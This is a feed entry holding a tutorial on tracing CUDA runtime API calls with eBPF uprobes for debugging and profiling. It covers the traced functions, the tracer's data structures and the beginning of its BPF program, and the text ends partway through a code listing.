      <title>eBPF Tutorial: Tracing CUDA GPU Operations</title>
      <dc:creator>云微</dc:creator>
      <pubDate>Tue, 30 Dec 2025 07:16:43 +0000</pubDate>
      <link>https://forem.com/yunwei37/ebpf-tutorial-tracing-cuda-gpu-operations-45eb</link>
      <guid>https://forem.com/yunwei37/ebpf-tutorial-tracing-cuda-gpu-operations-45eb</guid>
      <description>&lt;p&gt;Have you ever wondered what's happening under the hood when your CUDA application is running? GPU operations can be challenging to debug and profile because they happen in a separate device with its own memory space. In this tutorial, we'll build a powerful eBPF-based tracing tool that lets you peek into CUDA API calls in real time.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;The complete source code: &lt;a href="https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/47-cuda-events" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/47-cuda-events&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  Introduction to CUDA and GPU Tracing
&lt;/h2&gt;

&lt;p&gt;CUDA (Compute Unified Device Architecture) is NVIDIA's parallel computing platform and programming model that enables developers to use NVIDIA GPUs for general-purpose processing. A typical CUDA application follows the same workflow: the host (CPU) allocates memory on the device (GPU) and copies input data from host memory to device memory, GPU kernels (functions) are launched to process the data, the results are copied back from device to host, and finally the device memory is freed.&lt;/p&gt;

&lt;p&gt;Each operation in this process involves CUDA API calls, such as &lt;code&gt;cudaMalloc&lt;/code&gt; for memory allocation, &lt;code&gt;cudaMemcpy&lt;/code&gt; for data transfer, and &lt;code&gt;cudaLaunchKernel&lt;/code&gt; for kernel execution. Tracing these calls can provide valuable insights for debugging and performance optimization, but doing so isn't straightforward. Many GPU operations are asynchronous: the CPU can continue executing after submitting work to the GPU without waiting for it to finish, and traditional debugging tools often can't cross this asynchronous boundary to inspect GPU internal state.&lt;/p&gt;

&lt;p&gt;This is where eBPF comes to the rescue! By using uprobes, we can intercept CUDA API calls in the user-space CUDA runtime library (&lt;code&gt;libcudart.so&lt;/code&gt;) before they reach the GPU driver, capturing critical information. This approach allows us to gain deep insights into memory allocation sizes and patterns, data transfer directions and volumes, kernel launch parameters, error codes and failure reasons returned by the API, and precise timing information for each operation. By intercepting these calls on the CPU side, we can build a complete view of an application's GPU usage behavior without modifying application code or relying on proprietary profiling tools.&lt;/p&gt;

&lt;p&gt;This tutorial primarily focuses on CPU-side CUDA API tracing, which provides a macro view of how applications interact with the GPU. However, CPU-side tracing alone has clear limitations. When a CUDA API function like &lt;code&gt;cudaLaunchKernel&lt;/code&gt; is called, it merely submits a work request to the GPU. We can see when the kernel was launched, but we cannot observe what actually happens inside the GPU. Critical details such as how thousands of threads access memory, their execution patterns, branching behavior, and synchronization operations remain invisible. These details are crucial for understanding performance bottlenecks, such as whether memory accesses fail to coalesce or whether severe thread divergence reduces execution efficiency.&lt;/p&gt;

&lt;p&gt;To achieve fine-grained tracing of GPU operations, eBPF programs need to run directly on the GPU. This is exactly what the eGPU paper and &lt;a href="https://github.com/eunomia-bpf/bpftime/tree/master/example/gpu" rel="noopener noreferrer"&gt;bpftime GPU examples&lt;/a&gt; explore. bpftime converts eBPF programs into PTX instructions that GPUs can execute, then dynamically modifies CUDA binaries at runtime to inject these eBPF programs at kernel entry and exit points, enabling observation of GPU internal behavior. This approach gives developers access to GPU-specific information such as block indices, thread indices, and global timers, and lets them measure and trace critical paths during kernel execution. This GPU-internal observability is essential for diagnosing complex performance issues, understanding kernel execution behavior, and optimizing GPU computation, none of which CPU-side tracing can provide.&lt;/p&gt;

&lt;h2&gt;
  
  
  Key CUDA Functions We Trace
&lt;/h2&gt;

&lt;p&gt;Our tracer monitors several critical CUDA functions that represent the main operations in GPU computing. Understanding these functions helps you interpret the tracing results and diagnose issues in your CUDA applications:&lt;/p&gt;

&lt;h3&gt;
  
  
  Memory Management
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;cudaMalloc&lt;/code&gt;&lt;/strong&gt;: Allocates memory on the GPU device. By tracing this, we can see how much memory is being requested, when, and whether it succeeds. Memory allocation failures are a common source of problems in CUDA applications.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;  &lt;span class="n"&gt;cudaError_t&lt;/span&gt; &lt;span class="nf"&gt;cudaMalloc&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt;&lt;span class="o"&gt;**&lt;/span&gt; &lt;span class="n"&gt;devPtr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;size_t&lt;/span&gt; &lt;span class="n"&gt;size&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;cudaFree&lt;/code&gt;&lt;/strong&gt;: Releases previously allocated memory on the GPU. Tracing this helps identify memory leaks (allocated memory that's never freed) and double-free errors.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;  &lt;span class="n"&gt;cudaError_t&lt;/span&gt; &lt;span class="nf"&gt;cudaFree&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;devPtr&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Data Transfer
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;cudaMemcpy&lt;/code&gt;&lt;/strong&gt;: Copies data between host (CPU) and device (GPU) memory, or between different locations in device memory. The direction parameter (&lt;code&gt;kind&lt;/code&gt;) tells us whether data is moving to the GPU, from the GPU, or within the GPU.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;  &lt;span class="n"&gt;cudaError_t&lt;/span&gt; &lt;span class="nf"&gt;cudaMemcpy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;dst&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;src&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;size_t&lt;/span&gt; &lt;span class="n"&gt;count&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;cudaMemcpyKind&lt;/span&gt; &lt;span class="n"&gt;kind&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;kind&lt;/code&gt; parameter can be:&lt;/p&gt;

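&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;cudaMemcpyHostToHost&lt;/code&gt; (0): Copying within CPU memory&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;cudaMemcpyHostToDevice&lt;/code&gt; (1): Copying from CPU to GPU&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;cudaMemcpyDeviceToHost&lt;/code&gt; (2): Copying from GPU to CPU&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;cudaMemcpyDeviceToDevice&lt;/code&gt; (3): Copying within GPU memory&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;cudaMemcpyDefault&lt;/code&gt; (4): Direction inferred from the pointer values&lt;/li&gt;
&lt;/ul&gt;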
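&lt;p&gt;Because the tracer sees &lt;code&gt;kind&lt;/code&gt; as a plain integer, a small lookup makes the output readable. The sketch below is one possible way to do it; &lt;code&gt;memcpy_kind_name&lt;/code&gt; is a hypothetical helper, and the numeric values are those of &lt;code&gt;enum cudaMemcpyKind&lt;/code&gt; in the CUDA runtime headers.&lt;/p&gt;

```c
#include <assert.h>
#include <string.h>

/* Hypothetical helper: translate a raw cudaMemcpyKind value into a label. */
static const char *memcpy_kind_name(int kind)
{
    switch (kind) {
    case 0:  return "HostToHost";
    case 1:  return "HostToDevice";
    case 2:  return "DeviceToHost";
    case 3:  return "DeviceToDevice";
    case 4:  return "Default";
    default: return "Unknown";   /* anything outside the documented enum */
    }
}
```

&lt;p&gt;Returning a fixed label for out-of-range values keeps the formatter safe even if a probe reads a garbage argument.&lt;/p&gt;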

&lt;h3&gt;
  
  
  Kernel Execution
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;cudaLaunchKernel&lt;/code&gt;&lt;/strong&gt;: Launches a GPU kernel (function) to run on the device. This is where the actual parallel computation is started. Because the launch is asynchronous, tracing this call shows when a kernel was submitted and whether the launch itself succeeded, not when the kernel finished.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;  &lt;span class="n"&gt;cudaError_t&lt;/span&gt; &lt;span class="nf"&gt;cudaLaunchKernel&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;func&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;dim3&lt;/span&gt; &lt;span class="n"&gt;gridDim&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;dim3&lt;/span&gt; &lt;span class="n"&gt;blockDim&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; 
                              &lt;span class="kt"&gt;void&lt;/span&gt;&lt;span class="o"&gt;**&lt;/span&gt; &lt;span class="n"&gt;args&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;size_t&lt;/span&gt; &lt;span class="n"&gt;sharedMem&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;cudaStream_t&lt;/span&gt; &lt;span class="n"&gt;stream&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Streams and Synchronization
&lt;/h3&gt;

&lt;p&gt;CUDA uses streams for managing concurrency and asynchronous operations:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;cudaStreamCreate&lt;/code&gt;&lt;/strong&gt;: Creates a new stream. Operations within a stream execute in order, but they may run concurrently with operations in other streams.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;  &lt;span class="n"&gt;cudaError_t&lt;/span&gt; &lt;span class="nf"&gt;cudaStreamCreate&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cudaStream_t&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;pStream&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;cudaStreamSynchronize&lt;/code&gt;&lt;/strong&gt;: Waits for all operations in a stream to complete. This is a key synchronization point that can reveal performance bottlenecks.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;  &lt;span class="n"&gt;cudaError_t&lt;/span&gt; &lt;span class="nf"&gt;cudaStreamSynchronize&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cudaStream_t&lt;/span&gt; &lt;span class="n"&gt;stream&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Events
&lt;/h3&gt;

&lt;p&gt;CUDA events are used for timing and synchronization:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;cudaEventCreate&lt;/code&gt;&lt;/strong&gt;: Creates an event object for timing operations.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;  &lt;span class="n"&gt;cudaError_t&lt;/span&gt; &lt;span class="nf"&gt;cudaEventCreate&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cudaEvent_t&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;event&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;cudaEventRecord&lt;/code&gt;&lt;/strong&gt;: Records an event in a stream, which can be used for timing or synchronization.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;  &lt;span class="n"&gt;cudaError_t&lt;/span&gt; &lt;span class="nf"&gt;cudaEventRecord&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cudaEvent_t&lt;/span&gt; &lt;span class="n"&gt;event&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;cudaStream_t&lt;/span&gt; &lt;span class="n"&gt;stream&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;cudaEventSynchronize&lt;/code&gt;&lt;/strong&gt;: Waits for an event to complete, which is another synchronization point.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;  &lt;span class="n"&gt;cudaError_t&lt;/span&gt; &lt;span class="nf"&gt;cudaEventSynchronize&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cudaEvent_t&lt;/span&gt; &lt;span class="n"&gt;event&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Device Management
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;cudaGetDevice&lt;/code&gt;&lt;/strong&gt;: Gets the current device being used.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;  &lt;span class="n"&gt;cudaError_t&lt;/span&gt; &lt;span class="nf"&gt;cudaGetDevice&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;device&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;cudaSetDevice&lt;/code&gt;&lt;/strong&gt;: Sets the device to be used for GPU executions.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;  &lt;span class="n"&gt;cudaError_t&lt;/span&gt; &lt;span class="nf"&gt;cudaSetDevice&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;device&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;By tracing these functions, we gain complete visibility into the lifecycle of GPU operations, from device selection and memory allocation to data transfer, kernel execution, and synchronization. This enables us to identify bottlenecks, diagnose errors, and understand the behavior of CUDA applications.&lt;/p&gt;

&lt;h2&gt;
  
  
  Architecture Overview
&lt;/h2&gt;

&lt;p&gt;Our CUDA events tracer consists of three main components:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Header File (&lt;code&gt;cuda_events.h&lt;/code&gt;)&lt;/strong&gt;: Defines data structures for communication between kernel and user space&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;eBPF Program (&lt;code&gt;cuda_events.bpf.c&lt;/code&gt;)&lt;/strong&gt;: Implements kernel-side hooks for CUDA functions using uprobes&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;User-Space Application (&lt;code&gt;cuda_events.c&lt;/code&gt;)&lt;/strong&gt;: Loads the eBPF program, processes events, and displays them to the user&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The tool uses eBPF uprobes to attach to CUDA API functions in the CUDA runtime library. When a CUDA function is called, the eBPF program captures the parameters and results, sending them to user space through a ring buffer.&lt;/p&gt;

&lt;h2&gt;
  
  
  Key Data Structures
&lt;/h2&gt;

&lt;p&gt;The central data structure for our tracer is the &lt;code&gt;struct event&lt;/code&gt; defined in &lt;code&gt;cuda_events.h&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;event&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="cm"&gt;/* Common fields */&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;                  &lt;span class="cm"&gt;/* Process ID */&lt;/span&gt;
    &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;comm&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;TASK_COMM_LEN&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt; &lt;span class="cm"&gt;/* Process name */&lt;/span&gt;
    &lt;span class="k"&gt;enum&lt;/span&gt; &lt;span class="n"&gt;cuda_event_type&lt;/span&gt; &lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;&lt;span class="cm"&gt;/* Type of CUDA event */&lt;/span&gt;

    &lt;span class="cm"&gt;/* Event-specific data (union to save space) */&lt;/span&gt;
    &lt;span class="k"&gt;union&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="kt"&gt;size_t&lt;/span&gt; &lt;span class="n"&gt;size&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;mem&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;                 &lt;span class="cm"&gt;/* For malloc/memcpy */&lt;/span&gt;
        &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ptr&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;free_data&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;             &lt;span class="cm"&gt;/* For free */&lt;/span&gt;
        &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="kt"&gt;size_t&lt;/span&gt; &lt;span class="n"&gt;size&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;kind&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;memcpy_data&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="cm"&gt;/* For memcpy */&lt;/span&gt;
        &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;func&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;launch&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;               &lt;span class="cm"&gt;/* For kernel launch */&lt;/span&gt;
        &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;device&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;device&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;               &lt;span class="cm"&gt;/* For device operations */&lt;/span&gt;
        &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;handle&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;handle&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;             &lt;span class="cm"&gt;/* For stream/event operations */&lt;/span&gt;
    &lt;span class="p"&gt;};&lt;/span&gt;

    &lt;span class="n"&gt;bool&lt;/span&gt; &lt;span class="n"&gt;is_return&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;           &lt;span class="cm"&gt;/* True if this is from a return probe */&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;ret_val&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;              &lt;span class="cm"&gt;/* Return value (for return probes) */&lt;/span&gt;
    &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;details&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;MAX_DETAILS_LEN&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt; &lt;span class="cm"&gt;/* Additional details as string */&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This structure is designed to efficiently capture information about different types of CUDA operations. The &lt;code&gt;union&lt;/code&gt; is a clever space-saving technique since each event only needs one type of data at a time. For example, a memory allocation event needs to store the size, while a free event needs to store a pointer.&lt;/p&gt;
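&lt;p&gt;The saving is easy to measure. The sketch below copies the payload members from &lt;code&gt;struct event&lt;/code&gt; into a standalone union and, for comparison only, into a struct that stores them side by side. The names &lt;code&gt;payload&lt;/code&gt;, &lt;code&gt;payload_flat&lt;/code&gt;, and &lt;code&gt;bytes_saved&lt;/code&gt; are hypothetical and do not appear in the tutorial code.&lt;/p&gt;

```c
#include <assert.h>
#include <stddef.h>

/* Payload laid out as a union, mirroring the members of struct event. */
union payload {
    struct { size_t size; } mem;
    struct { void *ptr; } free_data;
    struct { size_t size; int kind; } memcpy_data;
    struct { void *func; } launch;
    struct { int device; } device;
    struct { void *handle; } handle;
};

/* The same members stored side by side, for comparison only. */
struct payload_flat {
    struct { size_t size; } mem;
    struct { void *ptr; } free_data;
    struct { size_t size; int kind; } memcpy_data;
    struct { void *func; } launch;
    struct { int device; } device;
    struct { void *handle; } handle;
};

/* Bytes saved per event by overlapping the members instead of listing them. */
static size_t bytes_saved(void)
{
    return sizeof(struct payload_flat) - sizeof(union payload);
}
```

&lt;p&gt;On a typical 64-bit Linux target the union occupies 16 bytes (the size of its largest member, &lt;code&gt;memcpy_data&lt;/code&gt;) while the flat layout needs 56. The cost is that only the member matching the event's &lt;code&gt;type&lt;/code&gt; field holds meaningful data, so readers must check &lt;code&gt;type&lt;/code&gt; before touching the union.&lt;/p&gt;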

&lt;p&gt;The &lt;code&gt;cuda_event_type&lt;/code&gt; enum helps us categorize different CUDA operations:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="k"&gt;enum&lt;/span&gt; &lt;span class="n"&gt;cuda_event_type&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;CUDA_EVENT_MALLOC&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;CUDA_EVENT_FREE&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;CUDA_EVENT_MEMCPY&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;CUDA_EVENT_LAUNCH_KERNEL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;CUDA_EVENT_STREAM_CREATE&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;CUDA_EVENT_STREAM_SYNC&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;CUDA_EVENT_GET_DEVICE&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;CUDA_EVENT_SET_DEVICE&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;CUDA_EVENT_EVENT_CREATE&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;CUDA_EVENT_EVENT_RECORD&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;CUDA_EVENT_EVENT_SYNC&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This enum covers the main CUDA operations we want to trace, from memory management to kernel launches and synchronization.&lt;/p&gt;
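&lt;p&gt;In user space, the enum value usually has to be turned back into something printable. A minimal sketch of such a lookup follows; the enum is repeated so the snippet compiles on its own, and &lt;code&gt;event_type_name&lt;/code&gt; is a hypothetical helper whose output strings are an assumption, so the repository's own formatting may differ.&lt;/p&gt;

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

enum cuda_event_type {
    CUDA_EVENT_MALLOC = 0,
    CUDA_EVENT_FREE,
    CUDA_EVENT_MEMCPY,
    CUDA_EVENT_LAUNCH_KERNEL,
    CUDA_EVENT_STREAM_CREATE,
    CUDA_EVENT_STREAM_SYNC,
    CUDA_EVENT_GET_DEVICE,
    CUDA_EVENT_SET_DEVICE,
    CUDA_EVENT_EVENT_CREATE,
    CUDA_EVENT_EVENT_RECORD,
    CUDA_EVENT_EVENT_SYNC
};

/* Hypothetical helper: map an event type to the CUDA function it represents. */
static const char *event_type_name(enum cuda_event_type type)
{
    static const char *const names[] = {
        [CUDA_EVENT_MALLOC]        = "cudaMalloc",
        [CUDA_EVENT_FREE]          = "cudaFree",
        [CUDA_EVENT_MEMCPY]        = "cudaMemcpy",
        [CUDA_EVENT_LAUNCH_KERNEL] = "cudaLaunchKernel",
        [CUDA_EVENT_STREAM_CREATE] = "cudaStreamCreate",
        [CUDA_EVENT_STREAM_SYNC]   = "cudaStreamSynchronize",
        [CUDA_EVENT_GET_DEVICE]    = "cudaGetDevice",
        [CUDA_EVENT_SET_DEVICE]    = "cudaSetDevice",
        [CUDA_EVENT_EVENT_CREATE]  = "cudaEventCreate",
        [CUDA_EVENT_EVENT_RECORD]  = "cudaEventRecord",
        [CUDA_EVENT_EVENT_SYNC]    = "cudaEventSynchronize",
    };
    size_t count = sizeof(names) / sizeof(names[0]);

    /* Guard against values that are not part of the enum. */
    if ((size_t)type >= count)
        return "unknown";
    return names[type];
}
```

&lt;p&gt;Designated initializers keep each string tied to its enumerator, so reordering the enum does not silently mislabel events.&lt;/p&gt;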

&lt;h2&gt;
  
  
  The eBPF Program Implementation
&lt;/h2&gt;

&lt;p&gt;Let's dive into the eBPF program (&lt;code&gt;cuda_events.bpf.c&lt;/code&gt;) that hooks into CUDA functions. The full code is available in the repository, but here are the key parts:&lt;/p&gt;

&lt;p&gt;First, we create a ring buffer to communicate with user space:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_MAP_TYPE_RINGBUF&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
